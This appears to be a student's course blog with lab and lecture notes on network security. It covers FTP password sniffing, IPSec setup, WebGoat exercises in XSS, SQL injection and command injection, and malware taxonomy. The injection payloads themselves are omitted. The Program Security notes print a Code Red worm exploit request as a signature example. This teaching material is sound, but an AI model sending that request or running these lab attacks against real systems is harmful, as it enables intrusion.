When the tides of life turn against you... And the current upsets your boat... Don't waste those tears on what might have been... Just lay on your back and float!...

Lab 6 ~Security in Network~

Assalamualaikum w.b.t..

Lab 6 kiteorg blajar Security In Network.. Camner kiter nk securekn network kiter tue la bih kurengg.. huhuhuhu... tul ker erk? yer kot!... Aper yg perlu tahu:-
• Identify the vulnerabilities of FTP.
• Using Wireshark to capture FTP username and password.
• Explain what is IPSec.
• Enabling IPSec for securing FTP session.


Network Security and IPSec
A computer network is defined as a connection between two or more computer. Two computers are said to be interconnected if they are able to exchange information. Since it beginning network has become an essential tool for computer user. Computer users nowadays are depending on network, you cannot imagine the world without computer networking. At the beginning of their existence, computer networks were
primarily used by university researchers for sending email and by corporate employees for sharing printers. Under these conditions security did not get a lot of attention. But nowadays, as millions of ordinary citizens are using networks for banking, shopping and sending sensitive information, network security is required as a potentially massive problem.


Capturing File Transfer Protocol (FTP) Username and password
Normally FTP and Telnet send their username and password in clear text. This is not secure because intruder can used Network Monitoring tool such as Wireshark to sniff all the packet transfer during the session especially username and password. Therefore it is necessary to protect your username and password to overcome
any unauthorized activity.

1. Start your virtual machine containing winserv03_server and winserv03_client.
2. Login as Administrator
3. Set the IP address of your winserv03_server and winserv03_client as below

On winserv03_server
4. Check that your winserv03_server is already installed with FTP server and Wireshark. If FTP server installed than start the FTP service using [Start] | [Administrative tools] | [Internet Information Services (IIS)] otherwise you need a Windows Server 2003 CD to installed Internet Information Services (IIS) with FTP.


5. Whereas if wireshark is not install then it can be downloaded for free from http://www.wireshark.org.
6. If it is installed then open Wireshark on winserv03_server. [Start] | [Program] | [Wireshark].

7. Click on [Capture] | [Interfaces] to choose the network interfaces you wanted to monitor, refer figure 6.4. Choose the network interfaces that has an IP number 0f 192.168.1.106,click [Start], refer figure 6.X.


On winserv03_client
8. On winserv03_client VM open a command prompt, login to FTP server on winserv03_server using the following command.

On winserv03_server
9. As your login view the Wireshark interface on winserv03_server VM, you will notice that the username and password that you to login to the FTP server from the winserv03_client side is clearly seen on the monitor. Capture the screen of your
Wireshark output using print screen button on your keyboard.
10. To simulate this on the real environment you need two computers connected via a cross cable.




Using IPSec to secure FTP Transaction
IPSec is one of the solutions to safeguard the transmissionof data over FTP from being seen by an unauthorized user. Even though it is not mandatory to use IPSec in IPv4, it is already available in IPv4 and user has the choice to enable it. IPSec will encrypt the data sent using normal FTP connection, thus only the
authorized party can see the content. On winserv03_server
1. Click [Start] | [Run] and then type mmc.
2. Management Console will appear and then, on the menu bar click [File] | [Add/Remove snap-in].
3. On the Add/Remove Snap-in box, click [Add] button and select the [IP Security Monitor] and click [OK].
Figure below :

4. Repeat step 3 by selecting IP Security Policy Management on
Local Machine and then click [Finish].
5. On the Add/Remove Snap-in, click [OK].
6. In the right pane, right-click on [Secure Server (Require
Security)] | [Properties].
7. In the Secure Server (Require Security) Properties dialog box, highlight All IP Traffic and click [Edit].
8. On the Edit Rule Properties dialog box, select the Authentication Method tab. Click add and screen New Authentication Method Properties will appear. Select Use this string (preshared key) and then type MSPRESS in the scroll box, then click OK. Make sure your client preshared key must be same as server preshared key
9. Highlight the Preshared Key and click the [Move up] button to make the preshared key as a first priority for the authentication.
On winserv03_client
10. Click [OK] on the [Secure Server (Require Security)] Properties dialog box and close it.
11. Right-click on [Secure Server (Require Security)], and click [Assign] from the pop-up menu.
12. Click [Start] | [Run] and then type mmc.
13. Management Console will appear and on the menu bar click [File] | [Add/Remove snap-in].
14. On the Add/Remove Snap-in box, click [Add] button and select the [IP Security Monitor] and click [OK].
15. Repeat step 3 by selecting IP Security Policy Management on Local Machine and then click [Finish].
16. On the Add/Remove Snap-in, click [OK].
17. In the right pane, right-click on [Secure Server (Require Security)] | [Properties].
18. In the Client (Response Only) Properties dialog box, highlight and click [Edit].
19. On the Edit Rule Properties dialog box, select the [Authentication Method] tab. Click [add] and screen New Authentication Method Properties will appear. Select Use this string (preshared key) and then type MSPRESS in the scroll
box, then click [OK].
20. Highlight the Preshared Key and click the Move up button to make the preshared key as a first priority for the authentication. Click [Apply] | [OK].
21. Click [OK] on the Client (Response Only) Properties dialog box and close it.
22. Right-click on Client (Response Only), and click [Assign]. Click [Apply] | [OK].


Hmm.. lam lab kali nie aku xbejayer aplikasikan kt PC aku.. der prob per ntahh.. so, aku just tgk member yg wat kat PC dia... So far paham gak la cikit2... Xpaham pn layan ajer.. uhukksss...


alhamdulillahh...


"To the world you might be one person, but to one person you might be the world.."

Read More......

Lecture 6 ~Security In Networks~

Assalamualaikum w.b.t..

Lecture 6 kiteorg diterangkan tentang Security In Networks... Topic cover in dis lecture:-
~Introduction to Network
~Who cause security problem
~Network security issues
~Network security controls


Overview Of Computer Networks
Definition
• A computing network is a computing environment with more than one independent
processors
•May be multiple users per system
•Distance between computing systems is not considered (a communications media
problem)
•Size of computing systems is not relevant


Network Resources
•Computers
•Operating system
•Programs
•Processes
•People


Network Architecture



What is a Network Can Provide?
~Logical interface function
•Sending messages
•Receiving messages
•Executing program
•Obtaining status information
•Obtaining status information on other network users and their status


Basic Terminology
~Node
•Single computing system in a network.
~Host
•A single computing system's processor.
~Link
•A connection between two hosts.
~Topology
•The pattern of links in a network.


Types Of Network



Network Topology
Bus Topology
•To provide a single communication network on which any node can place information
and from which any code can retrieve information
•Attachments to the bus do not impact the other nodes on the bus



Star Topology
•Has a central switch
•All nodes wishing to communicate do so through the central host
•The central host receives all messages, identifies the addresses, selects the link
appropriate for that addresses and forwards the messages



Ring Topology
•To connect a sequence of nodes in a loop or ring
•Can be implemented with minimum cabling
•Containing a token can control a “synchronous” loop



Mesh Topology
•Each node can conceptually be connected directly to each other node
•Has integrity and routing advantages
•Not easily subject to destructive failures
•Routing logic can be used to select the most efficient route through multiple
nodes



ISO REFERENCE MODEL
~Open Systems Interconnection (OSI)
•Describes computer network communications.
•Developed by the International Standards Organization (ISO).
•Consists of Seven Layers.
•Model describes peer-to-peer correspondence, relationship between corresponding
layers of sender and receiver.
•Each layer represents a different activity performed in the actual transmission of
a message.
•Each layer serves a separate function.
•Equivalent layers perform similar functions for sender and receiver.


Layer Responsible



Message Assembly In ISO Model



Networks As Systems
~Single System
•Single set of security policies associated with each computing system.
•Each system concerned with:
*integrity of data
*secrecy of data
*availability of service
•Operating system enforces its owns security policies.


Advantages Of Computing Networks
~Resource sharing
•Reduces maintenance and storage costs.
~Increased reliability (i.e. availability of service)
•If one system fails users can shift to another.
~Distributing the workload
•Workload can be shifted from a heavily loaded system to an underutilized one.
~Expandability
•System is easily expanded by adding new nodes


Who Cause Security Problem
•Hacker
•Spy
•Student
•Businessman
•Ex-employee
•Stockbroker
•Terrorist
•etc


Network Security Problem Area
~Authentication
•Deals with determining whom you are talking to before entering into a business
deal or before revealing sensitive information
~Secrecy
•What usually comes to mind when people think about network security
~Non-repudiation
•Deals with signature
~Integrity control
•Keeping information is not modified, add or delete by unauthorized user


Network Security Issues
~Disadvantages of computing networks
•Sharing
*Access controls for a single system may be inadequate.
~Complexity
•A network may combine two or more systems with dissimilar operating systems with
different mechanisms for interhost connection. Complexity of this nature makes
the certification process extremely difficult.
•Unknown perimeter
*One host may be a node on two or more different networks.
~Disadvantages of computing networks
•Many points of attack
*Access controls on one machine preserves the secrecy of data on that processor.
However, files stored in a remote network host may pass through many host
machines to get to the user.
•Unknown path
*May be many paths from one host to another and users generally do not have
control of how their messages are routed.
•Label formats differences
*A problem which may occur in multilevel systems is that the access labels may
have different formats since there is no standard.
~Disadvantages of computing networks
•Anonymity
*Attack can passed through many other hosts in an effort to disguise from where
the attack originated
*Attack remotely without contact the system administrator or user


Threats In Network
~Security Exposures
•Privacy
*With many unknown users on a network, concealing sensitive data becomes more
difficult.
•Data Integrity
*Because more nodes and more users have potential access to a computing system,
the risk of data corruption is higher.
•Authenticity
*It is difficult to assure the identity of a user on a remote system.
•Covert channels
*Networks offer more possibilities for construction of covert channels for data
flow.
~Impersonating
•Involved the use of physical keys and biometrics checks
•Cracker can configures a system to masquerade as another system, thus gaining
unauthorized access to resources or information on system that ‘trust’ the system
being mimicked
~Eavesdropping
•Allows a cracker to make a complete transcript of network activity
•Cracker can obtain sensitive information such as passwords, data and procedures
for performing functions.
•Cracker can eavesdrops:
*Using wiretapping
*By radio
*Via auxiliary ports on terminals
*Using software that monitors packets sent over the network.
~Denial of service
•A user can render the system unusable for legitimates users by ‘hogging’ a
resource or damaging or destroying resources
•Attacks may be caused deliberately or accidentally
•3 forms of network denial of service attacks:
*Service overloading
*Message flooding
*Signal grounding
~Packet replay
•Refers to recording and retransmission of message packets in the network
•Intruder could replay legitimate authentication sequence messages to gain access
to a system
•Frequently undetectable
~Packet modification
•Significant with integrity threat
•Involves a system intercepting and modifying a packet destined for another system


Networks Security Control
~Encryption
~Strong Authentication
~IPSec,VPN,SSH
~Kerberos
~Firewall
~Intrusion Detection System (IDS)
~Intrusion Prevention System (IPS)
~Honeypot


Encryption
~Link to Link VS End to End
~Link to Link
•Covers layer 1 and 2 of the OSI model
•Decryption occurs just as the communication arrives at and enters the receiving
computer.
•If we have good physical security, we may not be too concerned about this
exposure.
~End to End
•Provides security from one end of a transmission to the other layer 6 or 7
•The encryption can be done by:
*A hardware device between the user and the host.
*A software running on the host computer.
•Protect data on every layer


Strong Authentication
~In strong authentication, one entity ‘proves’ its identity to another by
demonstrating knowledge of a secret known to be associated with that entity,
without revealing that secret itself during the protocol.
~Also called ‘challenge-response’ authentication.
~Use cryptographic mechanisms to protect messages in protocol:
•Encryption.
•Integrity mechanism (e.g. MAC).
•Digital signature.


IPSec,SSH,SSL(application level sec.)
~IPSec
•Optional in IPv4
•Defines a standard means for handling encrypted data.
•Implemented at IP layer, so affects all layer above it, in particular TCP and UDP.
•Provide authentication (AH) and encryption (ESP)
~SSH
•Secure remote login (encrypt data send over the network)
~SSL
•Secure socket layer, encrypt data over the transport layer.
•SSL interfaces between applications (such as browsers) and the TCP/IP protocols
to provide server authentication, optional client authentication, and an
encrypted communications channel between client and server.


Kerberos
~Supports authentication in distributed systems.
~Kerberos is based on the idea that a central server provides authentication tokens,
called tickets, to requesting applications.
•A ticket is an unforgeable, nonreplayable, authenticated object.
•It is an encrypted data structure naming a user and a service that is allowed to
obtain.
•Also contain a time value and some control information.



Firewall
•What is a firewall?
•A Firewall is a network security device designed to restrict access to resources
(information or services) according to a security policy.
•Firewalls are not a “magic solution” to network security problems, nor are they a
complete solution for remote attacks or unauthorised access to data
•A Firewall is a network security device
•It serves to connect two parts of a network and control the traffic (data) which
is allowed to flow between them
•Often installed between an entire organisation's network and the Internet
•Can also protect smaller departments
•A Firewall is always the single path of communication between protected and
unprotected networks
•A Firewall can only filter traffic which passes through it
•If traffic can get to a network by other means, the Firewall cannot block it


Intrusion Detection System
~Is a device or software tools or hardware tools that monitor activity to identify
malicious or suspicious events
~Used to detect unauthorized access to a computer system or network
~IDS component
•Sensor
*generate security events
•Console
*to monitor events and alerts and control the sensors
•Central Engine
*records events logged by the sensors in a database and uses a system of rules to
generate alerts from security events received
~Types of IDS
•Signature based
•Anamoly based


Intrusion Prevention System
~network security device that monitors network and/or system activities for
malicious or unwanted behavior and can react, in real-time, to block or prevent
those activities
~Network-based IPS, for example, will operate in-line to monitor all network traffic
for malicious code or attacks
~When an attack is detected, it can drop the offending packets while still allowing
all other traffic to pass
~Intrusion prevention technology is considered by some to be an extension of
intrusion detection (IDS) technology
~In addition, most IPS solutions have the ability to look at (decode) layer 7
protocols like HTTP, FTP, and SMTP which provides greater awareness


Honeypot
~Decoy systems that are designed to lure a potential attacker away from critical
systems
~Design to
•Divert attacker from critical system
•Collect information on attacker’s activity
•Encourage attacker to stay long enough for admin. to notice
~Contain fabricated info. not for normal user to used
~Simulated traffic that emulate real network


Hacking And Prevention
~motivated by thrill of access and status
•hacking community a strong meritocracy
•status is determined by level of competence
~benign intruders might be tolerable
•do consume resources and may slow performance
•can’t know in advance whether benign or malign
~IDS / IPS / VPNs can help counter
~awareness led to establishment of CERTs
•collect / disseminate vulnerability info / responses
~Hacker Behavior Example
1. select target using IP lookup tools
2. map network for accessible services
3. identify potentially vulnerable services
4. brute force (guess) passwords
5. install remote administration tool
6. wait for admin to log on and capture password
7. use password to access remainder of network


Criminal Enterprise
~organized groups of hackers now a threat
•corporation / government / loosely affiliated gangs
•typically young
•often Eastern European or Russian hackers
~common target credit cards on e-commerce server criminal hackers usually have
specific targets
~once penetrated act quickly and get out
~IDS / IPS help but less effective
~sensitive data needs strong protection


Criminal Enterprise Behavior
1. act quickly and precisely to make their activities harder to detect
2. exploit perimeter via vulnerable ports
3. use trojan horses (hidden software) to leave back doors for re-entry
4. use sniffers to capture passwords
5. do not stick around until noticed
6. make few or no mistakes.


Inside Attacker
~among most difficult to detect and prevent
~employees have access & systems knowledge
~may be motivated by revenge / entitlement
•when employment terminated
•taking customer data when move to competitor
~IDS / IPS may help but also need:
•least privilege, monitor logs, strong authentication,
~termination process to block access & mirror data


Inside Behavior Example
1. create network accounts for themselves and their friends
2. access accounts and applications they wouldn't normally use for their daily jobs
3. e-mail former and prospective employers
4. conduct furtive instant-messaging chats
5. visit web sites that cater to disgruntled employees, such as f'dcompany.com
6. perform large downloads and file copying
7. access the network during off hours.


Hacking And Prevention
~Exploitation of machine/Unauthorized used of machine and network resources
~Hacking involves 5 phase
•Reconaisance
•Scanning
•Gaining access
•Maintaining access
•Covering track


Reconaisance And Scanning
~Gaining general information on the target host
•Company background
•Number of machine
•Types of machine
•OS
•Domain name
•IP address
•Location


How To?
~Find out initial information
*Google,whois,Nslookup
~Find out address range
*ARIN
*Traceroute
~Find active machine
*Ping
~Find open port
*Ports scanner
*Nmap
*War dialers
~Figure out OS
*Nmap
~Map Out Network
*VisualRoute


Gaining And Maintaining Access
~The info. Gather from previous step can help identifying vulnerabilities
~Exploit vulnerabilities to gain access
*Un patch system is dangerous as the vulnerabilities has been made worldwide
*Milw0rm.com, www.securityfocus.com, insecure.org and etc
*Vulnerabilities is used to install backdoor than can be used for future attack.
~Tools are available online
*Backtrack, metasploit and etc


Covering Track
~Every activity is logged
~Syslog, accesslog, eventlog,


Lam lecture nie encek go thru jer semue coz encek ckp kiteorg da biaser sgt daa blajar mender nie.. ermm.. mmg pn.. tp.. kiteorg jer xbraper nk ingt.. encek kater bacer ajer sniri.. bacer ajer ler...


alhamdulillah...



"Live your life in the manner that you would like your kids to live theirs.."

Read More......

Lab 5 ~ Web Application Security ~

Assalamualaikum w.b.t...

Lab 5 kali nie kiteorg blajar Web Application Security... Apa yg kiteorg blajar adalah camner menggunakan Web Application Hacking simulation using WebGoat and WebScarab. Antare objektif yg perlu dicapai:-
• Describe the flaw of web application and how it is exploited.
• Exploit web application vulnerabilities.
• List prevention method that can be taken to overcome web
application vulnerabilities

Web Application Security
Web application or simply called webapp is an application that can be accessed using a web browser over a network, either the Internet or within the Local Area Network. It is developed using browser-supported language such as HTML, JavaScript, PHP, ASP
and etc. The script produced is then rendered by common web browser. Web application let user to access application or system anywhere and at any time provided the user is connected to a network connection and there is a web browser installed on the
machine. This ease of usage makes webapp popular among Internet user. Moreover the ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers contribute to the
popularity of the webapp. Nowadays webapp is used for accessing mail, online banking, online shopping, online reservation, wikis and many other functions.


WebGoat and WebScarab
WebGoat is a simulation toolkit used to demonstrate how we can exploit the vulnerabilities of a poorly design web application. The design of the web application in the WebGoat is deliberately designed with insecure J2EE framework so that user can understand the security issue by applying the security knowledge
they have into exploiting a real vulnerability in WebGoat application. In every scenario of the lesson, WebGoat provide hints and code to further explain the lesson. WebGoat will keep track on the progress of the user on every lesson they completed, user can see their level of competence in trying to solve every problem given in the lesson.


Web Application Hacking simulation using WebGoat and WebScarab
1. Copy the WebGoat-OWASP_Standard-5.2.zip and extract it to the C:\ drive
2. Open the C:\ WebGoat-5.2 folder and open the webgoat.bat to start the apache
tomcat J2EE

3. Open an IE 6.0 web browser or a firefox web browser and type http://localhost/WebGoat/attack

4. login as User Name: guest Password: guest

5. open webscarab-selfcontained-20070504-1631.jar
6. If the WebScarab does not open do install the JDK module (jdk-6u4-windows-i586-
p.exe) to your computer.
7. Once the WebScarab started, you should see the interface as figure below

8. Next Configure the Web browser proxy starting so that it listen to 127.0.0.1
(localhost) port 8008
9. Go to WebScarab and click on the intercept tab and enable the intercept request
checkbox but disable the intercept response checkbox. This will enable the
intercept features of the WebScarab in which it will intercept any request
signal from the web browser.

10. Close your previous web browser, open it again and type in
http://localhost/WebGoat/attack.
11. WebScarab will intercept your request to visit the website by prompting an Edit
request window as depicted in figure below. This prompted window shows the
request data that you send to the web server.

12. The text field indicated by the arrow shows the text field containing the data
you send to the web server and it can be modified.(in some of the following task
you need to modified the content of the text field to help you solve the problem
in lesson.
13. For this task do not changes the text field value just click the [Accept
changes] button to view the WebGoat main page.
14. Each time you click on a submit button or a link on the webpage, the Edit
request window will always appear, so make sure you click on Accept changes
button to view your request page display on the browser.



Getting started with WebGoat and WebScarab
1. click on [Start WebGoat]

2. Click on the Introduction | How to work with WebGoat menu.

3. Read and follow the instruction given in the WebGoat.



XSS attack
Task
1. This lesson will show you how XSS is used for phishing attack
2. Click on the Cross Site Scripting (XSS) | Phising with XSS menu.
3. Apply the script below to the text field in order to create a false login page so
that you can harvest the username and password keyed in by the user.


4. Once you hit the Search button you will see a comment page containing a place for you to login. This login page is created using the java script above.
5. Try login in with any username and password; if this is a real phishing website you would not get the prompted message on your screen but the value you supplied might be send across the world to a server that gather the login
information.
6. Next click on the Cross Site Scripting (XSS) | Reflected XSS Attacks menu.
7. In this lesson some prevention mechanism has been build in the script, some field have a validation toward the character you supplied. It will reject any tag symbol you used, however there are still some that is not protected. By using
the script below find which the text field that can be exploited using XSS attack?




Injection Flaws
Task
1. This lesson will show you how SQL Injection is applied to an application system.
2. Click on the Injection Flaws | Numeric SQL Injection menu, refer figure below

3. From the combo list choose a weather station and click the [Go!] button, (Do not
forget to click on the accept changes button of the edit request windows) you
will get the information for the country you select.
4. To apply the Injection flaws you need to choose a new country and click [Go!]
button. Before clicking the [Accept changes] button on the edit request windows,
in the [URLEncoded] tab, add the value station variable with

5. Once the value is changed, click [Accept changes] button. The entire data is
displayed on the screen. This shows that by manipulating the input field that is
not properly design we can display the entire data in the database.

6. Repeat this task on the Injection Flaws | String SQL Injection. Use the right
input for this problem and compare the result. (Hint: The input should be a
string).


Malicious File Execution
Task
1. This lesson will show you how Malicious File Execution is applied to an online application system.
2. Click on the Injection Flaws | Command Injection menu, refer figure below

3. By choosing the lesson plan to view and clicking on [View] button, user will be
shown the content of the lesson. This exercise will manipulate the input field by
adding the input with a command line instruction.
4. Select a new lesson and click [View]. Before clicking the [Accept changes] button
add the following command to your HelpFile variable value

5. Once you click the [Accept changes] button the following output will be displayed
on the screen.



Mase muler2 aku mmg xpham.. then tgk bdk2 laen wat.. so far ok laaa... buat2 ler faham.. yuhuuu.... Mcm beser siap kan review question..


alhamdulillah...


"Worry is like a rocking chair -- it gives you something to do but doesn't get you anywhere.."

Read More......

Lecture 5 ~Program Security~

Assalamualaikum w.b.t...

Lecture 5 kiteorg blajar bab Program Security... Topic lam lecture nie:-
~Vulnerabilities
•Secure Program
•Malicious Code
•Top 10 Web application vulnerabilities
~Safeguard to Program threat
~Pillar to Software Security


Secure Programs
~Different people have different perspective on software quality.
~Tracking faults (from developers):
•Requirements
•Design
•Code inspections Note: fixing might cause more faults
~Failures - are effects of faults
~Vulnerability and flaws do not map to faults and failures
~"Bugs" means different things, depending on context.
~IEEE says "fault" is inside view from the developer Failure - outside view from
user
~Types of Flaws:
•validation error
•domain error
•serialization and aliasing
•inadequate identification and authentication
•boundary condition violation
•other exploitable logic errors


Nonmalicious Program Errors?
~Buffer Overflows
•Accidental not checking array bounds Example C program

~Incomplete Mediation - data exposed or uncontrolled
http://www.testing.com/order.asp?cutID=115&part=666&qty=3&price=500&total=1500
~Time of Check to Time of use
•the process of executing the instruction
•Process all the data in the local storage rather than put on the clipboard.


Viruses and Other Malicious Code
•Programs work on data and users usually don't see the raw data.
•Malicious users can make programs that access data and other programs other than
what was intended.
•Malicious code can do harm.
•Malicious code has been around for a long long time (70's).
•Malicious code can also be accidental.


Malicious Codes
~unanticipated or undesired effects in programs generated on the intent of damage
~damage could be in form of :
•modification/destruction
•stolen data
•unauthorized access
•damage on system
•or other forms not intended by users


Viruses and ”Malicious Programs”
•Computer “Viruses” and related programs have the ability to replicate themselves
on an ever increasing number of computers. They originally spread by people
sharing floppy disks. Now they spread primarily over the Internet (a “Worm”).

•Other “Malicious Programs” may be installed by hand on a single machine. They may
also be built into widely distributed commercial software packages. These are
very hard to detect before the payload activates (Trojan Horses, Trap Doors, and
Logic Bombs).


Taxanomy of Malicious Programs



Examples of malicious codes:
~Trojan Horse - a program which performs a useful function, but also performs an
unexpected action as well.
~Virus - a code segment which replicates by attaching copies to existing executables.
•Transient - only executes when the program that it is attached to runs.
•Resident - once the program executes the virus stays in memory until it gets
triggered again. Terminate and Stay Resident (TSR).
•Worm - a program which replicates itself and causes execution of the new copy.
•Bacteria - replicates until it fills all disk space, or CPU cycles
•Logic bomb - malicious code that activates on an event (e.g., date).
•Trap Door (or Back Door) - undocumented entry point written into code for
debugging that can allow unwanted users.
~Spyware - This is new and can be non-malicious or malicious.
•Can steal your information (Identity Theft) This is done with a keystroke logger
and even though you use encryption on connections the damage is already done
before you can send it.
•Can steal your email addresses
•Can see what Web sites you visit
•Can see contents of files
•PopUp ads
•Slow down your computer
•Crash your computer



Viruses
~Personal computer viruses exploit the lack of effective access controls in these
systems
•modify files and OS itself
~Characteristics of a virus:
•replication
•requires a host program as a carrier
•activated by external action
•replication limited to (virtual) system
~Viruses are currently designed to attack single platforms.
~A virus can be referred to for example, as an IBM-PC virus (referring to the
hardware) or a DOS virus (referring to the hardware)
~The unexpected and uncontrollable replication of viruses makes them so dangerous.


How Viruses Attach
~Append viruses - execute first then transfers control to original program.
~Surround virus -has control before and after regular program.
~Integrated viruses - replace some of the target program or all of the target and
give the effect that the target program worked.


Virus Appended to a Program



How Viruses Gain Control
~The virus needs to have the CPU execute it to be in control.
~One way is to overwrite the program on the disk.
~Another is to move the original program and then after the CPU executes it then
transfer control to the program.
~Another is to install itself in memory and change the pointers of the operating
system or interrupt table to point to it.


Homes for Viruses
•Install itself in the boot sector (MBR) master boot record.
•Memory resident virus - (TSR) terminate and stay resident.
•Other homes such as applications like word processors and spread sheets and even
attachments to email.
•Even attachments to vendor distributed programs or games.


Types of Viruses
Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.

Memory-resident Virus - Lodges in main memory as part of the residual operating system.

Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses).

Stealth Virus - explicitly designed to hide from Virus Scanning programs.

Polymorphic Virus - mutates with every new host to prevent signature detection.


Truths and Misconceptions About Viruses
•Although other computers/operating systems are vulnerable to Viruses, it seems the
mentality of the programmers of Viruses is more common on PCs.
•Viruses can modify hidden and read only files. True
•Viruses can appear only in data files or Word docs, or in programs. False
•Viruses spread only on disks or in e-mail. False
•Viruses can not live in memory when the computer is shut off, but they can still be
on other storage devices. Also Reboot (warm start) is vulnerable to Viruses in
memory. True
•Viruses cannot infect hardware. True
•Viruses can be malevolent, benign, or benevolent. True


How Worm Attack




Worms
~Characteristics of a worm:
•self-contained, do not require a host
•replication
•activated by creating process
•for network worms, replication occurs across communication links
~Worms exploit flaws in the operating system or inadequate system management to
replicate.
~Release of a worm usually results in brief but spectacular outbreaks, shutting down
entire networks.
~Protection against Worms
•requires a combination of basic system security and good network security
•add-on tools:
*configuration review tools
*checksum-based change detection tools
*intrusion detection tools
•network security tools:
*wrapper program : filter network connections
*firewall system
~The most important means of defense is the identification & authentication (I&A)
controls, which are usually integrated into the system. If poorly managed, these
controls become a vulnerability which is easily exploited.



Targeted Malicious Code
~The previous notes have dealt with anonymous code not targeted to a specific
system, application or a particular purpose.
~Trapdoors - secret, undocumented entry point into a module or program.
~Salami Attack


Trapdoors and the Salami Attack
~Trapdoors are often caused by programmers leaving debug routines in the code. Or
failure to check array bounds which lets code overrun the array bounds and get
placed on the stack.
~Causes of Trapdoors:
•Programmer forgets to remove them.
•Programmer intentionally leaves them in for testing.
•Leaves them in intentionally for maintenance of the finished product.
•Leaves them in for later covert means of access.
~Salami Attacks refer to the simple fact, that when dealing with real numbers the
computer has a fixed size and will perform rounding or truncation. There will
always be those programmers that will try to conceal the small amounts on the hope
that humans will not notice



Top 10 web app vulnerabilities
~Attack associated to programs error
•Cross site scripting
•Injection flaws
•Malicious file execution
•Insecure direct object reference
•Cross site request forgery
•Information leakage and improper error handling
•Broken authentication and session management
•Insecure crypto storage
•Insecure comms
•Failure to restrict URL access



Virus Signatures
~Virus cannot be completely invisible but can be very hard to detect, especially if
it has self-modifying code.
~The code it executes can be identified and a program can scan for the tell-tail
code.
~Usually it is at the start of a program or maybe a test and jump to code at the
bottom of the file.
~If the virus writer wants to keep the program size the same to prevent detection
then it has to replace some of the program code.
~But a good scanner with a checksum can detect the changes in the code.


Example of cod red worm sign
GET/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a


The Source of Viruses
•Virus program can be small so it hides very easily in a large program.
•Might hide in a compiler, a data base manager or a file manager.
•The number one spot is an attachment to email or some public download file.


Virus Phases
•Dormant phase - the virus is idle
•Propagation phase - the virus places an identical copy of itself into other
programs
•Triggering phase – the virus is activated to perform the function for which it was
intended
•Execution phase – the function is performed



Preventing Virus Infection
~Protection against viruses
•detection tools
*example : scanners, vulnerability monitors, modification detection programs
•identification tools
*example : scanners
•removal tools
*example : disinfectors Ways to prevent Virus infections
~Scanners and disinfectors are the most popular classes of anti-virus software.
~Personal and administrative practices and institutional policies with regard to
shared or external software usage should form the first line of defense.
~Ways to prevent Virus infections
•Use only commercial software acquired from reliable, well established vendors.
•Test all new software on an isolated computer.
•Do not put a floppy disk in the machine unless it has been scanned first.
•Do not open attachments to email unless they have been scanned. Including turn
off the auto open of attachments in mail readers.
•Scan any downloaded files before they are run.
•At least once a week update the virus signature data files.
~Make a bootable disk with a virus scan program on it and write protected.
~Make and retain backup copies of executable system files in the event the virus
detection program can't remove the virus.


Preventing Web application attack
•Input validation.
•Strong output encoding.
•Do not use "blacklist" validation
•Do not use GET requests (URLs) for sensitive data or to perform value transactions
•Disable or limit detailed error handling
•errors from all layers are adequately checked and configured to prevent error
messages from being exploited by intruders
•Do not allow the login process to start from an unencrypted page
•Encrypt Password
•Check the old password when the user changes to a new password
•Do not create cryptographic algorithms
•Do not use weak algorithms
•Ensure the access control matrix is part of the business, architecture, and design
of the application


Controls Against Program Threats
•Software Engineering
•Modularity, Encapsulation, and Information Hiding
•Peer reviews
•Hazard Analysis HAZOP, FMEA, FTA
•Independent Testing
•Good Design
•Prediction
•Static Analysis
•Configuration Management
•Proofs of Program Correctness
•Operating System Controls - trusted software, confinement, audit log
•Administrative Controls - Standards of program development


Pillar of software security
•Risk Management
•Touchpoints
•Knowledge


Risk Management
•Business understands the idea of risk even software risk
~Technical perfection is impossible
~There no such thing as 100% security
•Perfect quality is a myth
•Technical problem do not always spur action
~Answer the So what? Question explicitly
•Help user undesrtand what they should do about risk
•Build better software


Touchpoints



Knowledge catalog
~Principles
~Guidelines
~Rules
~Attack patterns
~Vulnerabilities
~Historical Risks


Summary of Program Threats and Controls
~Malicious code gets a lot of publicity. But don't let media attention distract you
from the seriousness of the threat.
~There is no real way to measure the amount of damage that malicious code can do.
All one can do is estimate, and that is only for the discovered programs, what
about the ones that haven't been discovered or haven't been executed, or worst the
ones that haven't been written yet.



Summary
~Viruses come in different forms
~Some are mere nuisances, some come with devastating consequences
~E-mail worms are self replicating and clogs the networks with unwanted traffic
~Virus codes are not necessarily complex
~It is necessary to scan the systems/networks for infections on a periodic basis for
protection against viruses
~Anti-dotes to new virus releases are promptly made available by security companies
and the forms the major counter measure.


Tue la antare yg kami blajar lam lecture kali nie... Enjoy ajer!...


alhamdulillah...


"Learn to enjoy little things -- there are so many of them.."

Read More......
Related Posts with Thumbnails